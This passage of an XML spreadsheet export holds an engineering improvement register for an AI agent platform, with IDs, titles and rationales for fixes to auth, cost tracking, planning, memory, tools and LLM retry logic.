   — which matters, because the pgvector search paths are all raw SQL today.
Whichever is chosen, `app_admin` still needs an explicit escape hatch. That escape hatch
is exactly why [AU-01](#au-01--any-admin-can-promote-themselves-to-app_admin) is
critical rather than merely bad.</t>
  </si>
  <si>
    <t>AU-I2</t>
  </si>
  <si>
    <t>One role enum, one guard</t>
  </si>
  <si>
    <t>### AU-I2 — One role enum, one guard
**Effect: medium.** A Python `Role` enum, and `RoleChecker` as the only guard. This
closes [AU-17](#au-17--two-functions-named-_require_admin-mean-different-things),
[AU-21](#au-21--the-role-strings-exist-as-a-comment-not-an-enum) and half of
[AU-01](#au-01--any-admin-can-promote-themselves-to-app_admin) in one change, and it
makes an audit of "who can call what" a grep instead of a reading exercise.</t>
  </si>
  <si>
    <t>AU-I3</t>
  </si>
  <si>
    <t>Add token_version to users</t>
  </si>
  <si>
    <t>### AU-I3 — Add `token_version` to `users`
**Effect: large for security, small in code.** One integer column, one claim, one
comparison in `_authenticate_user`. It gives the platform:
- working logout ([AU-12](#au-12--there-is-no-logout-endpoint)),
- token revocation ([AU-05](#au-05--access-tokens-cannot-be-revoked)),
- a real response to refresh-token reuse ([AU-09](#au-09--refresh-token-reuse-is-detected-and-ignored)),
- and instant lockout when a user is deactivated ([AU-04](#au-04--is_active-is-never-checked-so-deactivating-a-user-does-nothing)).
Four defects, one column.</t>
  </si>
  <si>
    <t>AU-I4</t>
  </si>
  <si>
    <t>Delete CompanySuspensionMiddleware</t>
  </si>
  <si>
    <t>### AU-I4 — Delete `CompanySuspensionMiddleware`
**Effect: medium, and it is a deletion.** See
[AU-22](#au-22--suspension-is-checked-twice-in-two-different-ways). It costs one extra
database round trip on every authenticated request and is strictly weaker than the check
that already runs in the dependency.</t>
  </si>
  <si>
    <t>AU-I5</t>
  </si>
  <si>
    <t>One visible_company_ids(user) helper</t>
  </si>
  <si>
    <t>### AU-I5 — One `visible_company_ids(user)` helper
**Effect: medium.** Replaces the five copies in
[AU-20](#au-20--five-independent-copies-of-own-company-plus-children). Every scoped
query then takes a list, and the partner fan-out becomes one `IN (...)` instead of a
query per child tenant — which is also
[PO-I6](01-PRODUCT-OVERVIEW-DEFECTS.md#po-i6--cache-the-partner-entity-fan-out).</t>
  </si>
  <si>
    <t>AU-I6</t>
  </si>
  <si>
    <t>Rate-limit login by email, not only by IP</t>
  </si>
  <si>
    <t>### AU-I6 — Rate-limit login by email, not only by IP
**Effect: medium.** The gateway's `200/minute` per remote address does nothing against a
distributed attempt and hurts legitimate users behind one NAT. A per-email counter with
exponential backoff is the right shape, and Redis is already there. The platform even
has a working sliding-window rate limiter in
[`ai/governance/rate_limiter.py`](../../../backend/src/ai/governance/rate_limiter.py)
with zero call sites.</t>
  </si>
  <si>
    <t>AU-I7</t>
  </si>
  <si>
    <t>Move refresh tokens into the cookie that already exists</t>
  </si>
  <si>
    <t>### AU-I7 — Move refresh tokens into the cookie that already exists
**Effect: medium.** The `HttpOnly; Secure; SameSite=lax` cookie is already being set on
four endpoints ([AU-16](#au-16--the-refresh-cookie-nobody-reads)). Reading it instead of
`localStorage` takes the long-lived credential out of reach of any XSS on the page. The
hard half is already done.</t>
  </si>
  <si>
    <t>AU-I8</t>
  </si>
  <si>
    <t>Add an audit log for permission changes</t>
  </si>
  <si>
    <t>### AU-I8 — Add an audit log for permission changes
**Effect: medium.** There is no record of who changed a role, who suspended a company, or
who deleted an email connection. With [AU-01](#au-01--any-admin-can-promote-themselves-to-app_admin)
open, there is also no way to tell after the fact whether it was used.
Role change, company status change and credential deletion are three events. Append-only,
never deleted.</t>
  </si>
  <si>
    <t>AU-I9</t>
  </si>
  <si>
    <t>Add a permission test suite generated from the route table</t>
  </si>
  <si>
    <t>### AU-I9 — Add a permission test suite generated from the route table
**Effect: large for confidence.** `04-auth-rbac-tenancy.md` already contains a complete
permission matrix derived from the guard code. Turning that table into a parameterised
test — for each route, for each of the six roles, assert allowed or 403 — would have
caught [AU-01](#au-01--any-admin-can-promote-themselves-to-app_admin),
[AU-03](#au-03--any-user-can-suspend-their-own-company) and
[AU-19](#au-19--app_user-is-a-role-with-almost-no-meaning) automatically.</t>
  </si>
  <si>
    <t>AU-I10</t>
  </si>
  <si>
    <t>Reduce the per-request database work</t>
  </si>
  <si>
    <t>### AU-I10 — Reduce the per-request database work
**Effect: medium.** Every authenticated request currently does: one middleware `SELECT`
on its own session, plus one `SELECT ... selectinload(User.company)` in the dependency.
Deleting the middleware ([AU-I4](#au-i4--delete-companysuspensionmiddleware)) removes
one. Caching the user-plus-company lookup in Redis for 30 seconds removes most of the
other. Role changes would then take up to 30 seconds to apply, which is a fair trade and
should be stated in the docs.
---</t>
  </si>
  <si>
    <t>AK-I1</t>
  </si>
  <si>
    <t>One cost write path</t>
  </si>
  <si>
    <t>### AK-I1 — One cost write path
**Effect: large.** Cause **C**. Today spend is recorded by the loop's `Budget`, by nested
step code mutating `run.total_cost_usd` on a different session, and by the critic pipeline
writing `usage_logs`. They are reconciled with `max()` in an order that is easy to break.
Make every spender write an attributed `usage_logs` row and nothing else. The budget then
reads a sum. This closes
[AK-02](#ak-02--the-budget-under-counts-spend-unless-three-separate-syncs-all-fire),
removes `_sync_budget_cost` entirely, and makes the cost dashboards agree with the run
row by construction.</t>
  </si>
  <si>
    <t>AK-I2</t>
  </si>
  <si>
    <t>Decide the fate of the Perceiver</t>
  </si>
  <si>
    <t>### AK-I2 — Decide the fate of the Perceiver
**Effect: large, either way.** Right now the platform builds a `Perception` every
iteration, fills its three most valuable fields with empty values, assigns it to state,
and reads it nowhere ([AK-05](#ak-05--perception-is-written-every-iteration-and-read-by-nothing),
[AK-06](#ak-06--the-perceivers-richest-fields-are-always-empty)).
Two honest options:
1. **Finish it** — pass the memory assembler, set `cortex_cursor`, and feed
   `to_prompt_block()` into the strategist prompt. This is the feature that makes CORTEX
   worth its cost.
2. **Delete it** — remove the Perceiver, `Perception` and the assignment.
Doing neither is the expensive choice, because it keeps the maintenance cost of a memory
system whose output nothing consumes.</t>
  </si>
  <si>
    <t>AK-I3</t>
  </si>
  <si>
    <t>Make the pre-critic run on the path that matters</t>
  </si>
  <si>
    <t>### AK-I3 — Make the pre-critic run on the path that matters
**Effect: medium.** [AK-04](#ak-04--the-pre-critic-almost-never-runs). The synthetic
`PASS` for plan-fragment moves was almost certainly a cost decision. If so, make it an
explicit sampling rule — critique one in N plan steps, or critique any step calling a
write-capable tool — rather than a blanket skip that reads like a bug.</t>
  </si>
  <si>
    <t>AK-I4</t>
  </si>
  <si>
    <t>Enforce or remove the child cap</t>
  </si>
  <si>
    <t>### AK-I4 — Enforce or remove the child cap
**Effect: large under load.** [AK-07](#ak-07--the-child-concurrency-cap-does-not-cap-anything).
Enforcing it needs the dedicated child queue that `worker.py` already declares and does
not route. Two changes, one outcome: a fan-out `PROCESS` stops being able to starve every
other run in the system.</t>
  </si>
  <si>
    <t>AK-I5</t>
  </si>
  <si>
    <t>Stop building the state dict twice per iteration</t>
  </si>
  <si>
    <t>### AK-I5 — Stop building the state dict twice per iteration
**Effect: medium.** `materialise_context_dict` copies the whole context dict on every
iteration and `absorb_context_dict` copies it back. For a run with large step outputs
that is two full copies of everything the run has produced, per iteration, purely to
bridge two representations of the same data.
Cause **A**. The fix is the typed-state migration the docstring already promises.</t>
  </si>
  <si>
    <t>AK-I6</t>
  </si>
  <si>
    <t>Sweep runs stuck in WAITING_ON_CHILDREN</t>
  </si>
  <si>
    <t>### AK-I6 — Sweep runs stuck in `WAITING_ON_CHILDREN`
**Effect: medium.** [AK-03](#ak-03--a-suspended-run-skips-finalisation-entirely). One
cron, one query: runs in `WAITING_ON_CHILDREN` whose `started_at` is older than their
governance timeout. Finalise them as `FAILED` and settle. Without it, a lost resume is
invisible forever.</t>
  </si>
  <si>
    <t>AK-I7</t>
  </si>
  <si>
    <t>Cache the token rollup</t>
  </si>
  <si>
    <t>### AK-I7 — Cache the token rollup
**Effect: medium.** `_sync_budget_tokens` runs a **recursive CTE over the whole run
subtree** at the end of every iteration. For a deep `PROCESS` that is an increasingly
expensive query, repeated up to 50 times per run, to compute a number that only changes
when a child finishes.
Recompute it when a child folds in, not every iteration.</t>
  </si>
  <si>
    <t>AK-I8</t>
  </si>
  <si>
    <t>Make the iteration budget adaptive</t>
  </si>
  <si>
    <t>### AK-I8 — Make the iteration budget adaptive
**Effect: medium.** `max_iterations` is a flat 50 for every entity, from an `ACTION` with
one step to a `PROCESS` orchestrating three agents. The `ACTION` will never use its 50
and the `PROCESS` may need more.
Derive the ceiling from the plan size, and keep the flat number as an absolute backstop.</t>
  </si>
  <si>
    <t>AK-I9</t>
  </si>
  <si>
    <t>Emit one iteration event, not many</t>
  </si>
  <si>
    <t>### AK-I9 — Emit one iteration event, not many
**Effect: small.** Every iteration publishes `iteration_start`, `budget_pressure`,
`executor_invoked`, `executor_completed`, up to four critic events, retry events and
`iteration_end` — each a separate Redis publish and a separate JSON serialisation.
Batching per iteration would cut publish volume several-fold with no loss of information
to the UI, which reduces them to one slice anyway.</t>
  </si>
  <si>
    <t>AK-I10</t>
  </si>
  <si>
    <t>Test the event-name contract</t>
  </si>
  <si>
    <t>### AK-I10 — Test the event-name contract
**Effect: small, prevents a recurring bug.**
[AK-11](#4-t2--delete-or-fix-the-name) is two typos that made two features invisible in
the UI with no error anywhere. A test asserting that every key in `_SSE_EVENT_TYPES`
matches a name actually emitted somewhere in `agent_loop.py` would catch it, and would
catch the next one.
---</t>
  </si>
  <si>
    <t>EP-I1</t>
  </si>
  <si>
    <t>Validate input at dispatch</t>
  </si>
  <si>
    <t>### EP-I1 — Validate input at dispatch
**Effect: large, cheap.** [EP-04](#ep-04--io_contractinput_schema-is-never-validated). One
`jsonschema.validate` in `trigger_execution` turns "the run failed at step 3 because a
variable was missing" into a 422 with a clear message and zero cost. The schema is already
there and already auto-generated.</t>
  </si>
  <si>
    <t>EP-I2</t>
  </si>
  <si>
    <t>Decide the fate of every dead setting in one pass</t>
  </si>
  <si>
    <t>### EP-I2 — Decide the fate of every dead setting in one pass
**Effect: large for trust.** [EP-05](#ep-05--eight-settings-in-the-builder-have-no-runtime-reader)
lists eight. Take them as one piece of work: for each, wire it or remove it from the
builder. Leaving them is the worst option, because a user who sets `max_recursion_depth: 2`
and watches a run go five deep loses confidence in every other control on the page.</t>
  </si>
  <si>
    <t>EP-I3</t>
  </si>
  <si>
    <t>Store step outputs once</t>
  </si>
  <si>
    <t>### EP-I3 — Store step outputs once
**Effect: medium, immediate.** [EP-18](#ep-18--every-step-output-is-stored-twice). Halving
the context dict halves what is serialised into `run.context_state` on every snapshot,
halves what is copied by the loop's context bridge twice per iteration, and delays
context summarisation — which means less real data is trimmed away.</t>
  </si>
  <si>
    <t>EP-I4</t>
  </si>
  <si>
    <t>Pin a run to the entity version it started with</t>
  </si>
  <si>
    <t>### EP-I4 — Pin a run to the entity version it started with
**Effect: medium.** [EP-10](#ep-10--version-is-decorative). Snapshot the entity's config
onto the run row at dispatch, and have the loop read from the snapshot. This makes runs
reproducible, makes `version` mean something, and removes a whole class of
"it worked yesterday" reports.</t>
  </si>
  <si>
    <t>EP-I5</t>
  </si>
  <si>
    <t>Query artifacts by run_id</t>
  </si>
  <si>
    <t>### EP-I5 — Query artifacts by `run_id`
**Effect: medium.** [EP-21](#ep-21--the-execution-detail-page-finds-artifacts-by-regex).
The `artifacts` table has `run_id`, `agent_id` and `generated_by`. Using them removes the
regex, makes every produced file visible, and fixes the `pdf_generator` case as a side
effect.</t>
  </si>
  <si>
    <t>EP-I6</t>
  </si>
  <si>
    <t>Enforce unique step names within a plan</t>
  </si>
  <si>
    <t>### EP-I6 — Enforce unique step names within a plan
**Effect: small, prevents silent data loss.** Two steps with the same name overwrite each
other's output in the context dict, and nothing warns. The graph editor already runs a
validation pass on every change — add the check there and in the API.</t>
  </si>
  <si>
    <t>EP-I7</t>
  </si>
  <si>
    <t>Make the retry chain visible</t>
  </si>
  <si>
    <t>### EP-I7 — Make the retry chain visible
**Effect: medium.** [EP-03](#ep-03--parent_run_id-means-two-different-things). Splitting the
column also fixes billing for retries and lets the UI show "this is attempt 3 of a run
that first failed at 14:02", which is what a user actually wants to see.</t>
  </si>
  <si>
    <t>EP-I8</t>
  </si>
  <si>
    <t>One healing ladder</t>
  </si>
  <si>
    <t>### EP-I8 — One healing ladder
**Effect: medium.** [EP-22](#ep-22--with-the-resilience-flag-off-react-tool-calls-get-no-healing-at-all).
`ToolResilience` is the extracted, testable version with a proper `FailureKind` enum.
Finish the migration, delete the inline copy in `step_executor`, and remove the flag.
Definition of done for a migration is that the old path is gone.</t>
  </si>
  <si>
    <t>EP-I9</t>
  </si>
  <si>
    <t>Cost the plan before running it</t>
  </si>
  <si>
    <t>### EP-I9 — Cost the plan before running it
**Effect: large for users.** `planning/cost_estimator.py` already has per-tool baseline
costs refreshed nightly from telemetry. Running it at dispatch and comparing against
`governance.max_cost_usd` and the wallet balance would let the platform refuse a run it
cannot finish, instead of stopping halfway with "Partial results saved."
Pairs with [PO-I7](01-PRODUCT-OVERVIEW-DEFECTS.md#po-i7--give-the-wallet-a-low-balance-warning-before-the-run-dies).</t>
  </si>
  <si>
    <t>EP-I10</t>
  </si>
  <si>
    <t>Show reformat retries in the trace</t>
  </si>
  <si>
    <t>### EP-I10 — Show reformat retries in the trace
**Effect: small.** [EP-24](#ep-24--the-reformat-retry-is-billed-and-easy-to-miss). The
span machinery already exists. One extra span kind makes an invisible cost visible, and
makes "which tools keep needing reformatting" answerable — which is the signal that a tool
schema is wrong.
---</t>
  </si>
  <si>
    <t>PC-I1</t>
  </si>
  <si>
    <t>Make retries actually differ</t>
  </si>
  <si>
    <t>### PC-I1 — Make retries actually differ
**Effect: the largest win in this register.**
[PC-06](#pc-06--every-retry-strategy-executes-identically). All the diagnosis work is
already done and correct — `pick_retry` is a clean pure function with good logic. Only the
last step, carrying the decision into the `Move`, is missing.
Four fields on `Move` and four branches in the executor turn a decorative retry system
into a working one.</t>
  </si>
  <si>
    <t>PC-I2</t>
  </si>
  <si>
    <t>Charge alignment and give it an effect</t>
  </si>
  <si>
    <t>### PC-I2 — Charge alignment and give it an effect
**Effect: medium.** [PC-03](#pc-03--alignment-drift-is-measured-and-discarded). Two
changes: add a cost field to `AlignmentVerdict` so the spend is visible, and act on
`correction_hint` on the loop path the way the legacy engine did. Right now this stage is
pure cost.</t>
  </si>
  <si>
    <t>PC-I3</t>
  </si>
  <si>
    <t>Decide the critic budget properly</t>
  </si>
  <si>
    <t>### PC-I3 — Decide the critic budget properly
**Effect: large on cost.** Today the only cost control is the cost-share rule, which
switches to a `DEGRADED` mode that still runs the expensive stage
([PC-05](#pc-05--degraded-mode-still-runs-the-post-critic)). Make `DEGRADED` mean
something — skip the supervisor, use a cheaper model, or sample.
Then declare the knob ([PC-16](#pc-16--every-critic-knob-in-governance-is-undeclared)) so
a tenant can actually set it.</t>
  </si>
  <si>
    <t>PC-I4</t>
  </si>
  <si>
    <t>Wire intelligence_reader</t>
  </si>
  <si>
    <t>### PC-I4 — Wire `intelligence_reader`
**Effect: medium.** [PC-04](#pc-04--the-post-critic-never-sees-intelligence-rules). One
argument. The `CriticCalibrator` cron already runs weekly and writes findings into the
IntelligenceTree; nothing reads them back. Wiring the reader closes the loop and makes the
weekly job worth running.</t>
  </si>
  <si>
    <t>PC-I5</t>
  </si>
  <si>
    <t>Fix the placeholder rewrite</t>
  </si>
  <si>
    <t>### PC-I5 — Fix the placeholder rewrite
**Effect: medium.** [PC-18](#pc-18--_assign_step_ids-breaks-the-llms-own-placeholders).
This is a silent data-flow break on the dynamic-planning path — the hardest kind of bug to
notice, because the plan looks right and the steps run.</t>
  </si>
  <si>
    <t>PC-I6</t>
  </si>
  <si>
    <t>Emit planning telemetry</t>
  </si>
  <si>
    <t>### PC-I6 — Emit planning telemetry
**Effect: medium.** [PC-14](#4-t2--built-and-never-wired). `PlanGenerator` has full event
support and is always constructed without it. Planning is currently a black box in the
trace: you can see the plan that came out, not how many candidates were generated, which
was chosen, or what it cost.</t>
  </si>
  <si>
    <t>PC-I7</t>
  </si>
  <si>
    <t>Cache the plan for repeat runs</t>
  </si>
  <si>
    <t>### PC-I7 — Cache the plan for repeat runs
**Effect: large on cost.** An entity run twice on similar input generates a fresh plan
each time, with the multi-candidate path costing several LLM calls. For entities with a
static plan this is pure waste; for dynamic ones, a cache keyed on
`(entity_id, entity_version, input_shape)` would cut planning cost sharply on the runs that
repeat — which for a campaign or a scheduled agent is most of them.</t>
  </si>
  <si>
    <t>PC-I8</t>
  </si>
  <si>
    <t>Decide the fate of the unwired learning surfaces</t>
  </si>
  <si>
    <t>### PC-I8 — Decide the fate of the unwired learning surfaces
**Effect: medium.** [PC-11](#4-t2--built-and-never-wired) and
[PC-12](#4-t2--built-and-never-wired) are two complete learning systems with no callers,
plus a database table and a migration carried for one of them.
Both would improve results if wired: trust scores would let the memory layer down-weight
unreliable sources, and failure patterns would stop an entity repeating the same mistake.
Both should be finished or deleted; carrying them costs maintenance and reader confusion.</t>
  </si>
  <si>
    <t>PC-I9</t>
  </si>
  <si>
    <t>Attribute bandit reward per arm</t>
  </si>
  <si>
    <t>### PC-I9 — Attribute bandit reward per arm
**Effect: medium.** [PC-21](#pc-21--bandit-reward-is-run-level-and-blames-every-arm-equally).
Record which arm was active for which iterations and split the reward accordingly. With
per-iteration cost already tracked, the data is there.</t>
  </si>
  <si>
    <t>PC-I10</t>
  </si>
  <si>
    <t>One task-class key</t>
  </si>
  <si>
    <t>### PC-I10 — One task-class key
**Effect: small, unlocks the rest.** [PC-22](#pc-22--calibration-groups-by-a-key-the-bandit-does-not-use).
Use `state.task_class` in the calibrator too. Then calibration, bandit statistics and
step-health records all group the same way and can be reported together.
---</t>
  </si>
  <si>
    <t>MC-I1</t>
  </si>
  <si>
    <t>Wire the read path</t>
  </si>
  <si>
    <t>### MC-I1 — Wire the read path
**Effect: this is the whole subsystem.** [MC-01](#mc-01--cortex-is-write-only-on-the-live-path).
Concretely:
1. Pass a real `MemoryAssembler` into the `Perceiver`.
2. Feed `Perception.to_prompt_block()` into the step prompt.
3. Pass `intelligence_reader` into the critic pipeline.
4. Stop stripping `__memory__` from child contexts, or strip it selectively.
Until this is done, every other item in this file is about maintaining a system whose
output nobody consumes. Do it before optimising anything else here.</t>
  </si>
  <si>
    <t>MC-I2</t>
  </si>
  <si>
    <t>Make memory failures loud</t>
  </si>
  <si>
    <t>### MC-I2 — Make memory failures loud
**Effect: large.** [MC-06](#mc-06--every-retrieval-failure-is-silent). Count retrieval
errors, emit a span, and show "memory unavailable" on the run trace. This is what would
have surfaced MC-01 on the first run after it was introduced.</t>
  </si>
  <si>
    <t>MC-I3</t>
  </si>
  <si>
    <t>Register the two missing worker jobs</t>
  </si>
  <si>
    <t>### MC-I3 — Register the two missing worker jobs
**Effect: medium.** [MC-02](#mc-02--the-scheduled-dreaming-job-has-never-run). Two names
added to `WorkerSettings.functions`, plus a cron for graph maintenance. Then check whether
four dreaming sweeps a day is actually what you want before leaving it on — with MC-I1
done, dreaming output will finally reach prompts and its quality will start to matter.</t>
  </si>
  <si>
    <t>MC-I4</t>
  </si>
  <si>
    <t>Give CORTEX data an owner and a lifecycle</t>
  </si>
  <si>
    <t>### MC-I4 — Give CORTEX data an owner and a lifecycle
**Effect: medium, becomes urgent later.**
[MC-10](#mc-10--cortex-tables-have-no-foreign-keys-to-host-tables). Two jobs: delete a
company's trees when the company is deleted, and prune or archive nodes past a retention
window. Neither needs foreign keys. Decide the retention window now, while the tables are
small.</t>
  </si>
  <si>
    <t>MC-I5</t>
  </si>
  <si>
    <t>One chunker</t>
  </si>
  <si>
    <t>### MC-I5 — One chunker
**Effect: medium.** [MC-14](#mc-14--two-chunkers-with-different-sizes). Pick one size and
one overlap and use it on both ingestion paths. Record the chunker version on the node so
a future change can be migrated rather than mixed.</t>
  </si>
  <si>
    <t>MC-I6</t>
  </si>
  <si>
    <t>Validate the embedding dimension at startup</t>
  </si>
  <si>
    <t>### MC-I6 — Validate the embedding dimension at startup
**Effect: small, prevents a bad day.**
[MC-11](#mc-11--the-vector-dimension-is-hard-coded-in-two-places). Resolve the model,
check its dimension against the column, refuse to start on a mismatch. An admin switching
embedding models should get an error at configuration time, not a wall of failed inserts.</t>
  </si>
  <si>
    <t>MC-I7</t>
  </si>
  <si>
    <t>Index document_chunks.embedding or retire the v1 path</t>
  </si>
  <si>
    <t>### MC-I7 — Index `document_chunks.embedding` or retire the v1 path
**Effect: medium.** [MC-12](#mc-12--document_chunksembedding-has-no-ann-index). The
cleaner answer is to finish the migration to Knowledge Trees and drop v1 entirely —
`documents_to_knowledge_trees.py` already exists as a backfill. Two RAG paths with
different indexes, different chunkers and different tenant scoping is more surface than
this feature needs.</t>
  </si>
  <si>
    <t>MC-I8</t>
  </si>
  <si>
    <t>Cache the assembled memory block per run</t>
  </si>
  <si>
    <t>### MC-I8 — Cache the assembled memory block per run
**Effect: medium, once MC-I1 lands.** Memory assembly runs four domain queries plus an
embedding call. Doing that every iteration of a 30-iteration run is 30× the cost for
content that changes slowly. Assemble once per run, refresh only when a step writes
something new.</t>
  </si>
  <si>
    <t>MC-I9</t>
  </si>
  <si>
    <t>Report what memory contributed</t>
  </si>
  <si>
    <t>### MC-I9 — Report what memory contributed
**Effect: medium.** Once memory reaches prompts, the question everyone asks is "is it
helping?". Record which nodes were retrieved and whether the run succeeded; that is the
input `TrustLearner` ([PC-11](07-PLANNING-AND-CRITICS-DEFECTS.md#4-t2--built-and-never-wired))
was built to consume and currently has no source for.</t>
  </si>
  <si>
    <t>MC-I10</t>
  </si>
  <si>
    <t>Decide where cortex_memory lives</t>
  </si>
  <si>
    <t>### MC-I10 — Decide where `cortex_memory` lives
**Effect: medium.** [MC-20](#mc-20--most-of-srcaimemory-is-shims-over-an-unversioned-local-package).
Either publish it and depend on a version, or move it back into `src/ai/memory/` and
delete the shims. The current half-state means the memory implementation has no test gate
and no clear source of truth.
---</t>
  </si>
  <si>
    <t>TX-I1</t>
  </si>
  <si>
    <t>Cache tool prices per run</t>
  </si>
  <si>
    <t>### TX-I1 — Cache tool prices per run
**Effect: large.** Both cost blocks run an `IntegrationRegistry` query for **every tool
result**, inside the per-turn loop, with no caching
([TL-33](TOOL-LAYER-DEFECTS.md#tl-33--a-registry-select-per-tool-call-inside-the-react-loop)).
A research agent doing 25 searches issues 25 round trips for a value that changes daily.
`ToolCostResolver` already has the cache and has zero call sites
([TL-19](TOOL-LAYER-DEFECTS.md#tl-19--four-price-tables-one-of-which-is-the-unused-source-of-truth)).
Wiring it fixes the price-table sprawl and the query storm in one change.</t>
  </si>
  <si>
    <t>4. Improvements</t>
  </si>
  <si>
    <t>TX-I2</t>
  </si>
  <si>
    <t>One dispatch path, schema derived from the params model</t>
  </si>
  <si>
    <t>### TX-I2 — One dispatch path, schema derived from the params model
**Effect: large.** Today a tool can be entered four ways, structured arguments are
serialised to JSON and re-parsed inside each tool, and a large fraction of tool code is
defensive parsing — `pdf_generator` is 746 lines, most of it input rescue.
One `execute(params: ParamsModel, ctx: ExecutionContext) -&gt; ToolOutput` with the JSON
schema generated from the model removes the parsing code, makes schema/implementation
drift impossible, and closes
[TL-05](TOOL-LAYER-DEFECTS.md#tl-05--the-typed-dispatch-path-silently-drops-execution-context-in-scraper_tool),
[TL-30](TOOL-LAYER-DEFECTS.md#4-t2--delete) and
[TL-41](TOOL-LAYER-DEFECTS.md#tl-41--four-dispatch-paths-and-the-typed-one-fails-silently)
together.</t>
  </si>
  <si>
    <t>TX-I3</t>
  </si>
  <si>
    <t>Delete twelve tools before optimising anything</t>
  </si>
  <si>
    <t>### TX-I3 — Delete twelve tools before optimising anything
**Effect: large, and it is a deletion.** `quora` (4), `x_ads` (4) and `youtube_ads` (4) are
written against APIs that do not exist or cannot work as coded. Removing them takes the
registry from 98 tools to 86 and removes ~1,600 lines with `xlsx_engine.py` and the docx
templates.
Every subsequent change to the tool layer costs less afterwards.</t>
  </si>
  <si>
    <t>TX-I4</t>
  </si>
  <si>
    <t>Make the registry store factories, not instances</t>
  </si>
  <si>
    <t>### TX-I4 — Make the registry store factories, not instances
**Effect: medium.** [TX-02](#tx-02--tool-instances-are-process-wide-singletons). A factory
per tool removes a whole class of concurrency bug and makes per-call state safe to write —
which in turn makes the tools much simpler, since today they must thread everything
through arguments to avoid `self`.</t>
  </si>
  <si>
    <t>TX-I5</t>
  </si>
  <si>
    <t>Retry 429 and 5xx in the social base class</t>
  </si>
  <si>
    <t>### TX-I5 — Retry 429 and 5xx in the social base class
**Effect: medium.** `_api_request` re-raises **every** `httpx.HTTPStatusError`
immediately, with a comment saying "Don't retry client errors" — but the `except` catches
all status errors, so 429 and 5xx are never retried
([TL-37](TOOL-LAYER-DEFECTS.md#tl-37--the-social-base-class-never-retries-429-or-5xx)).
That is exactly the class of error social APIs return under load. The correct exponential
backoff already exists in `core/search.py`; reuse it.</t>
  </si>
  <si>
    <t>TX-I6</t>
  </si>
  <si>
    <t>Add pagination to social list calls</t>
  </si>
  <si>
    <t>### TX-I6 — Add pagination to social list calls
**Effect: medium.** Every `list` / `search` / `get_*` across all 16 platforms returns page
one and reports it to the model as the complete set
([TL-38](TOOL-LAYER-DEFECTS.md#tl-38--no-pagination-in-any-social-list-call)). The model
then reasons over a truncated set with no signal that it is truncated — which is worse
than an error, because the run completes with a confident wrong answer.</t>
  </si>
  <si>
    <t>TX-I7</t>
  </si>
  <si>
    <t>Idempotency keys on every write tool</t>
  </si>
  <si>
    <t>### TX-I7 — Idempotency keys on every write tool
**Effect: large for correctness under retry.** No social, email, CRM or media tool carries
one. Combined with the resilience layer's reformat-retry and fallback chain, a retried
step re-posts, re-sends and re-creates campaigns
([TL-39](TOOL-LAYER-DEFECTS.md#tl-39--no-idempotency-on-any-write-tool)).
The `idempotency_key` column already exists on `tool_interaction_logs` and is dead
([EP-14](06-EXECUTION-PIPELINE-DEFECTS.md#4-t2--dead-columns-and-dead-docs)). Use it.</t>
  </si>
  <si>
    <t>TX-I8</t>
  </si>
  <si>
    <t>Derive tool categories from the package</t>
  </si>
  <si>
    <t>### TX-I8 — Derive tool categories from the package
**Effect: small.** `_BUILTIN_CATEGORIES` is a hand-written map covering 22 of 98 tools; the
other 76 fall through to `general`, and the frontend offers a `social` filter that matches
nothing ([TL-35](TOOL-LAYER-DEFECTS.md#tl-35--_builtin_categories-covers-22-of-98-tools)).
The subpackage already *is* the category. Derive it and delete the map.</t>
  </si>
  <si>
    <t>TX-I9</t>
  </si>
  <si>
    <t>A contract test over every registered tool</t>
  </si>
  <si>
    <t>### TX-I9 — A contract test over every registered tool
**Effect: large for confidence.** Three separate defects —
[TL-43](TOOL-LAYER-DEFECTS.md#tl-43--youtube_upload_video-never-uploads-the-video),
[TL-46](TOOL-LAYER-DEFECTS.md#tl-46--video_generate-ignores-is_audio_required-and-reports-it-back)
and [TL-47](TOOL-LAYER-DEFECTS.md#tl-47--linkedin_create_post-advertises-image_url-and-never-reads-it)
— are the same bug: the advertised schema promises a parameter the code never reads.
One test that walks the registry and asserts every advertised parameter is referenced in
the implementation would have caught all three, and will catch the next one.</t>
  </si>
  <si>
    <t>TX-I10</t>
  </si>
  <si>
    <t>Async the blocking SDK calls</t>
  </si>
  <si>
    <t>### TX-I10 — Async the blocking SDK calls
**Effect: medium.** `video_generate` calls four synchronous SDK methods directly in an
async handler, stalling the worker for the full length of a Veo generation — up to the
360-second poll ceiling
([TL-32](TOOL-LAYER-DEFECTS.md#tl-32--blocking-sdk-calls-on-the-event-loop-in-video_generate)).
`asyncio.to_thread` around each one frees the worker to do everything else. This is one of
the highest ratios of throughput gained to lines changed anywhere in the codebase.
---</t>
  </si>
  <si>
    <t>LP-I1</t>
  </si>
  <si>
    <t>Add retry, timeout and jitter</t>
  </si>
  <si>
    <t>### LP-I1 — Add retry, timeout and jitter
**Effect: the largest reliability win available in the platform.**
[LP-03](#lp-03--there-is-no-retry-timeout-or-fallback-anywhere-in-the-llm-layer). One
bounded retry loop with exponential backoff and jitter on 429 and 5xx, plus an explicit
request timeout, in `LLMRouter.generate`.
Every agent run on the platform passes through this function. Thirty lines here is worth
more than any amount of retry logic further up the stack.</t>
  </si>
  <si>
    <t>LP-I2</t>
  </si>
  <si>
    <t>Then add provider fallback</t>
  </si>
  <si>
    <t>### LP-I2 — Then add provider fallback
**Effect: large.** Once retry exists, fallback is the natural next step: a second
integration per task type, used when the first is exhausted or unavailable. The data model
already supports it — `model_task_defaults` is per company per task, and `routing_mode`
has a `"router"` value waiting for exactly this
([LP-08](#lp-08--routing_mode-is-stored-returned-and-never-read)).
Either build it and make `routing_mode` real, or delete the setting. Do not leave it.</t>
  </si>
  <si>
    <t>LP-I3</t>
  </si>
  <si>
    <t>Validate cost_unit on write</t>
  </si>
  <si>
    <t>### LP-I3 — Validate `cost_unit` on write
**Effect: large for billing correctness.**
[LP-01](#lp-01--cost_unit-per_1k_tokens-over-bills-by-1000). A closed list of accepted
units, validated at the integration-create endpoint, plus normalisation before matching.
A pricing field that silently defaults to "no divisor" is the single most dangerous shape
in the billing path.</t>
  </si>
  <si>
    <t>LP-I4</t>
  </si>
  <si>
    <t>Count thinking tokens</t>
  </si>
  <si>
    <t>### LP-I4 — Count thinking tokens
**Effect: medium, and it is revenue.** [LP-06](#lp-06--gemini-thinking-tokens-are-not-counted).
The field is on the response; it is simply not read. For reasoning models this can be most
of the spend, so the platform is currently absorbing that cost.</t>
  </si>
  <si>
    <t>LP-I5</t>
  </si>
  <si>
    <t>Cache the resolved model per run, not per call</t>
  </si>
  <si>
    <t>### LP-I5 — Cache the resolved model per run, not per call
**Effect: medium.** Every LLM call resolves the model through `model_task_defaults` and
